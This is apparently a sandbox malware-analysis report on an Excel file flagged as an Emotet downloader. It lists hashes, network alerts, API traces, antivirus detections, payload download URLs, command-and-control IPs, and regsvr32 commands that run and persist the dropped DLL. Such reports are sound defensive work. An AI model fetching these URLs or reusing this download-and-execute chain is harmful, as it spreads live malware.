popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Iye11aStLm1

Excel with Emotet Emotet Malicious Library MS_Excel_Hidden_Macro_Sheet UPX MSOffice File PE File DLL OS Processor Check PE32
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us May 23, 2022, 9:32 a.m. May 23, 2022, 9:39 a.m.
Size 106.5KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: DSAfadr, Last Saved By: HRdtjnd, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 18:19:34 2015, Last Saved Time/Date: Wed Mar 30 09:26:54 2022, Security: 0
MD5 9c8d23b78158bb374cb274c7682256e4
SHA256 7c9ef24f3522ff243e77f5d6e0cb50f6766916fcc1ad2fe845f9d509e39a6b3f
CRC32 7816DAC6
ssdeep 3072:QsKpbdrHYrMue8q7QPX+5xtekEdi8/dgstsSmsCpH3iZu8ZGsMi:XKpbdrHYrMue8q7QPX+5xtFEdi8/dgiX
Yara
  • Win32_Trojan_Excel_Emotet_20220329_Zero - Excel with Emotet
  • MS_Excel_Hidden_Macro_Sheet - (no description)
  • Microsoft_Office_File_Zero - Microsoft Office File

Name Response Post-Analysis Lookup
www.garantihaliyikama.com
CNAME garantihaliyikama.com
A 213.128.75.146
213.128.75.146
www.gessersh.com
A 81.95.101.8
81.95.101.8
IP Address Status Action
104.131.11.205 Active Moloch
138.197.109.175 Active Moloch
164.124.101.2 Active Moloch
187.84.80.182 Active Moloch
213.128.75.146 Active Moloch
216.158.226.206 Active Moloch
68.183.94.239 Active Moloch
79.143.187.147 Active Moloch
81.95.101.8 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49166 -> 81.95.101.8:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 81.95.101.8:443 -> 192.168.56.103:49167 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49176 -> 68.183.94.239:80 2404318 ET CNC Feodo Tracker Reported CnC Server group 19 A Network Trojan was detected
TCP 192.168.56.103:49165 -> 81.95.101.8:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49179 -> 187.84.80.182:443 2404309 ET CNC Feodo Tracker Reported CnC Server group 10 A Network Trojan was detected
TCP 192.168.56.103:49180 -> 79.143.187.147:443 2404320 ET CNC Feodo Tracker Reported CnC Server group 21 A Network Trojan was detected
TCP 213.128.75.146:80 -> 192.168.56.103:49169 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 213.128.75.146:80 -> 192.168.56.103:49169 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 213.128.75.146:80 -> 192.168.56.103:49169 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 192.168.56.103:49177 -> 104.131.11.205:443 2404301 ET CNC Feodo Tracker Reported CnC Server group 2 A Network Trojan was detected
TCP 192.168.56.103:49178 -> 138.197.109.175:8080 2404304 ET CNC Feodo Tracker Reported CnC Server group 5 A Network Trojan was detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameA

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74de374b
NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x74e02b08
NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x74dd801a
SLClose-0x28c osppc+0x2cb5 @ 0x6c4e2cb5
SLLoadApplicationPolicies+0xb30 SLCallServer-0x31f osppc+0x15629 @ 0x6c4f5629
SLClose+0x4d1 SLpBeginGenuineTicketTransaction-0x4703 osppc+0x3412 @ 0x6c4e3412
SLpGetTokenActivationGrantInfo+0xd8 SLpGenerateTokenActivationChallenge-0xad osppc+0x129af @ 0x6c4f29af
SLGetTokenActivationGrants+0x721 SLGetTokenActivationCertificates-0x7e7 osppcext+0x5a648 @ 0x6b29a648
_MsoWzFromIhtk@4+0x73207 mso+0x1404a94 @ 0x71dc4a94
_MsoWzFromIhtk@4+0x72f96 mso+0x1404823 @ 0x71dc4823
_MsoDwGimmeUserInstallBehavior@8+0x1ad15 _MsoHrShowMetSharedNotebooksDlg@20-0x7a9d0 mso+0xcc30d3 @ 0x716830d3
_MsoDwGimmeUserInstallBehavior@8+0x1aa61 _MsoHrShowMetSharedNotebooksDlg@20-0x7ac84 mso+0xcc2e1f @ 0x71682e1f
_MsoFreeCvsList@4+0x261dac _MsoPwlfFromFlinfo@8-0x3674 mso+0x4e2b05 @ 0x70ea2b05
_MsoFreeCvsList@4+0x2616fd _MsoPwlfFromFlinfo@8-0x3d23 mso+0x4e2456 @ 0x70ea2456
0x1d33e2b
_MsoHrSetupHTMLImport@8+0x2ee7 _MsoHrOscServicesManagerSharepointURL@8-0x8f03 mso+0x200fda @ 0x70bc0fda
_MsoHrSetupHTMLImport@8+0x27d9 _MsoHrOscServicesManagerSharepointURL@8-0x9611 mso+0x2008cc @ 0x70bc08cc
_MsoFIEPolicyAndVersion@8+0x37cd _MsoTelemetryOnEndVBAMacroCallback@0-0x3f32 mso+0x1efa61 @ 0x70bafa61
_MsoFIEPolicyAndVersion@8+0x3574 _MsoTelemetryOnEndVBAMacroCallback@0-0x418b mso+0x1ef808 @ 0x70baf808
_MsoFIEPolicyAndVersion@8+0x3534 _MsoTelemetryOnEndVBAMacroCallback@0-0x41cb mso+0x1ef7c8 @ 0x70baf7c8
_MsoFEnsureMsoTypelib@0+0x2a5 _MsoInitShrGlobal@4-0x1bdf mso+0x23b6d @ 0x709e3b6d
_MsoExtTextOutW@32+0x85f _MsoFWndProcNeeded@4-0x4a1 mso+0x222ad @ 0x709e22ad
_MsoFGetTbShowKbdShortcuts@0+0x8b11 _MsoFDigitCh@4-0xbf35 mso+0x1b522d @ 0x70b7522d
_MsoFGetTbShowKbdShortcuts@0+0x8a6d _MsoFDigitCh@4-0xbfd9 mso+0x1b5189 @ 0x70b75189
_MsoFGetTbShowKbdShortcuts@0+0x795f _MsoFDigitCh@4-0xd0e7 mso+0x1b407b @ 0x70b7407b
_MsoFGetTbShowKbdShortcuts@0+0x788d _MsoFDigitCh@4-0xd1b9 mso+0x1b3fa9 @ 0x70b73fa9
_MsoFGetTbShowKbdShortcuts@0+0x784f _MsoFDigitCh@4-0xd1f7 mso+0x1b3f6b @ 0x70b73f6b
MdCallBack12-0x64a760 excel+0x37a4a @ 0x247a4a
MdCallBack12-0x64de96 excel+0x34314 @ 0x244314
MdCallBack12-0x67d476 excel+0x4d34 @ 0x214d34
MdCallBack12-0x67d76a excel+0x4a40 @ 0x214a40
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc004f011
exception.offset: 46887
exception.address: 0x766fb727
registers.esp: 29028384
registers.edi: 29028548
registers.eax: 29028384
registers.ebp: 29028464
registers.edx: 0
registers.ebx: 29029600
registers.esi: 3221549073
registers.ecx: 2147483648
1 0 0
request GET http://www.garantihaliyikama.com/wp-admin/FjgB6I/
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2396
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6bd28000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2396
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6bf22000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10098000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x753d1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b9a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b981000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b961000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2720
region_size: 135168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00970000
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b941000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74bc1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74eb1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74371000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b901000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c051000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74d71000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1236
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000040d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10098000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x753d1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b941000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b9e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b9c1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2852
region_size: 135168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00880000
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b9a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74bc1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74eb1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74371000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b8c1000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 10233565184
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Explorer
total_number_of_bytes: 0
1 1 0
Application Crash Process EXCEL.EXE with pid 2396 crashed
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74de374b
NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x74e02b08
NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x74dd801a
SLClose-0x28c osppc+0x2cb5 @ 0x6c4e2cb5
SLLoadApplicationPolicies+0xb30 SLCallServer-0x31f osppc+0x15629 @ 0x6c4f5629
SLClose+0x4d1 SLpBeginGenuineTicketTransaction-0x4703 osppc+0x3412 @ 0x6c4e3412
SLpGetTokenActivationGrantInfo+0xd8 SLpGenerateTokenActivationChallenge-0xad osppc+0x129af @ 0x6c4f29af
SLGetTokenActivationGrants+0x721 SLGetTokenActivationCertificates-0x7e7 osppcext+0x5a648 @ 0x6b29a648
_MsoWzFromIhtk@4+0x73207 mso+0x1404a94 @ 0x71dc4a94
_MsoWzFromIhtk@4+0x72f96 mso+0x1404823 @ 0x71dc4823
_MsoDwGimmeUserInstallBehavior@8+0x1ad15 _MsoHrShowMetSharedNotebooksDlg@20-0x7a9d0 mso+0xcc30d3 @ 0x716830d3
_MsoDwGimmeUserInstallBehavior@8+0x1aa61 _MsoHrShowMetSharedNotebooksDlg@20-0x7ac84 mso+0xcc2e1f @ 0x71682e1f
_MsoFreeCvsList@4+0x261dac _MsoPwlfFromFlinfo@8-0x3674 mso+0x4e2b05 @ 0x70ea2b05
_MsoFreeCvsList@4+0x2616fd _MsoPwlfFromFlinfo@8-0x3d23 mso+0x4e2456 @ 0x70ea2456
0x1d33e2b
_MsoHrSetupHTMLImport@8+0x2ee7 _MsoHrOscServicesManagerSharepointURL@8-0x8f03 mso+0x200fda @ 0x70bc0fda
_MsoHrSetupHTMLImport@8+0x27d9 _MsoHrOscServicesManagerSharepointURL@8-0x9611 mso+0x2008cc @ 0x70bc08cc
_MsoFIEPolicyAndVersion@8+0x37cd _MsoTelemetryOnEndVBAMacroCallback@0-0x3f32 mso+0x1efa61 @ 0x70bafa61
_MsoFIEPolicyAndVersion@8+0x3574 _MsoTelemetryOnEndVBAMacroCallback@0-0x418b mso+0x1ef808 @ 0x70baf808
_MsoFIEPolicyAndVersion@8+0x3534 _MsoTelemetryOnEndVBAMacroCallback@0-0x41cb mso+0x1ef7c8 @ 0x70baf7c8
_MsoFEnsureMsoTypelib@0+0x2a5 _MsoInitShrGlobal@4-0x1bdf mso+0x23b6d @ 0x709e3b6d
_MsoExtTextOutW@32+0x85f _MsoFWndProcNeeded@4-0x4a1 mso+0x222ad @ 0x709e22ad
_MsoFGetTbShowKbdShortcuts@0+0x8b11 _MsoFDigitCh@4-0xbf35 mso+0x1b522d @ 0x70b7522d
_MsoFGetTbShowKbdShortcuts@0+0x8a6d _MsoFDigitCh@4-0xbfd9 mso+0x1b5189 @ 0x70b75189
_MsoFGetTbShowKbdShortcuts@0+0x795f _MsoFDigitCh@4-0xd0e7 mso+0x1b407b @ 0x70b7407b
_MsoFGetTbShowKbdShortcuts@0+0x788d _MsoFDigitCh@4-0xd1b9 mso+0x1b3fa9 @ 0x70b73fa9
_MsoFGetTbShowKbdShortcuts@0+0x784f _MsoFDigitCh@4-0xd1f7 mso+0x1b3f6b @ 0x70b73f6b
MdCallBack12-0x64a760 excel+0x37a4a @ 0x247a4a
MdCallBack12-0x64de96 excel+0x34314 @ 0x244314
MdCallBack12-0x67d476 excel+0x4d34 @ 0x214d34
MdCallBack12-0x67d76a excel+0x4a40 @ 0x214a40
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc004f011
exception.offset: 46887
exception.address: 0x766fb727
registers.esp: 29028384
registers.edi: 29028548
registers.eax: 29028384
registers.ebp: 29028464
registers.edx: 0
registers.ebx: 29029600
registers.esi: 3221549073
registers.ecx: 2147483648
1 0 0
file C:\Users\test22\urtj.dll
cmdline C:\Windows\SysWow64\regsvr32.exe -s ..\urtj.dll
cmdline C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Cvvgrvwgvlwvwa\qrmzlhkfmktctc.xqw"
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2396
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef70000
process_handle: 0xffffffff
1 0 0
process regsvr32.exe
host 104.131.11.205
host 138.197.109.175
host 187.84.80.182
host 216.158.226.206
host 68.183.94.239
host 79.143.187.147
service_name qrmzlhkfmktctc.xqw service_path C:\Windows\SysWOW64\regsvr32.exe \s "C:\Windows\SysWOW64\Cvvgrvwgvlwvwa\qrmzlhkfmktctc.xqw"
Time & API Arguments Status Return Repeated

CreateServiceW

 service_start_name:
start_type: 2
password:
display_name: qrmzlhkfmktctc.xqw
filepath: C:\Windows\SysWOW64\regsvr32.exe \s "C:\Windows\SysWOW64\Cvvgrvwgvlwvwa\qrmzlhkfmktctc.xqw"
service_name: qrmzlhkfmktctc.xqw
filepath_r: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Cvvgrvwgvlwvwa\qrmzlhkfmktctc.xqw"
desired_access: 2
service_handle: 0x0067b6a8
error_control: 0
service_type: 16
service_manager_handle: 0x006aecb0
1 6796968 0
Time & API Arguments Status Return Repeated

URLDownloadToFileW

 url: https://www.gessersh.com/wp-includes/ZwQLepW/
stack_pivoted: 0
filepath_r: ..\urtj.dll
filepath: C:\Users\test22\urtj.dll
2148270085 0

URLDownloadToFileW

 url: http://www.garantihaliyikama.com/wp-admin/FjgB6I/
stack_pivoted: 0
filepath_r: ..\urtj.dll
filepath: C:\Users\test22\urtj.dll
1 0 0
parent_process excel.exe martian_process C:\Windows\SysWow64\regsvr32.exe -s ..\urtj.dll
Lionic Trojan.MSOffice.Generic.4!c
MicroWorld-eScan XLM.Trojan.Abracadabra.42.Gen
CAT-QuickHeal OLE.Emotet.46220
ALYac XLM.Trojan.Abracadabra.42.Gen
Sangfor Malware.Generic-XLM.Save.ma29
K7AntiVirus Trojan ( 0059086a1 )
K7GW Trojan ( 0059086a1 )
Arcabit XLM.Trojan.Abracadabra.42.Gen
VirIT X97M.Emotet.DGZ
Cyren XF/Emotet.C.gen!Eldorado
Symantec Scr.Malcode!gen
ESET-NOD32 DOC/TrojanDownloader.Agent.DXQ
TrendMicro-HouseCall Trojan.X97M.EMOTET.YXCC5Z
Avast VBS:Malware-gen
Kaspersky HEUR:Trojan.MSOffice.Generic
BitDefender XLM.Trojan.Abracadabra.42.Gen
Tencent OLE.Win32.Macro.704610
Ad-Aware XLM.Trojan.Abracadabra.42.Gen
Emsisoft XLM.Trojan.Abracadabra.42.Gen (B)
F-Secure Malware.W97M/YAV.Minerva.dtfit
DrWeb Exploit.Siggen3.30359
TrendMicro Trojan.X97M.EMOTET.YXCC5Z
McAfee-GW-Edition X97M/Downloader.om
FireEye XLM.Trojan.Abracadabra.42.Gen
Sophos Mal/DocDl-M
Ikarus Trojan-Downloader.XLM.Agent
Avira W97M/YAV.Minerva.dtfit
Microsoft TrojanDownloader:O97M/Emotet.AMDF!MTB
ViRobot XLS.Z.Agent.109056.MI
ZoneAlarm HEUR:Trojan.MSOffice.Generic
GData XLM.Trojan.Abracadabra.42.Gen
Cynet Malicious (score: 99)
AhnLab-V3 Downloader/XLS.XlmMacro.S1792
McAfee X97M/Downloader.om
MAX malware (ai score=87)
Zoner Probably Heur.W97ShellB
Rising Downloader.Agent/XLM!1.DCEE (CLASSIC)
Fortinet XF/CoinMiner.Z!tr
AVG VBS:Malware-gen
dead_host 79.143.187.147:443
dead_host 104.131.11.205:443
dead_host 192.168.56.103:49180
dead_host 138.197.109.175:8080
dead_host 68.183.94.239:80
dead_host 187.84.80.182:443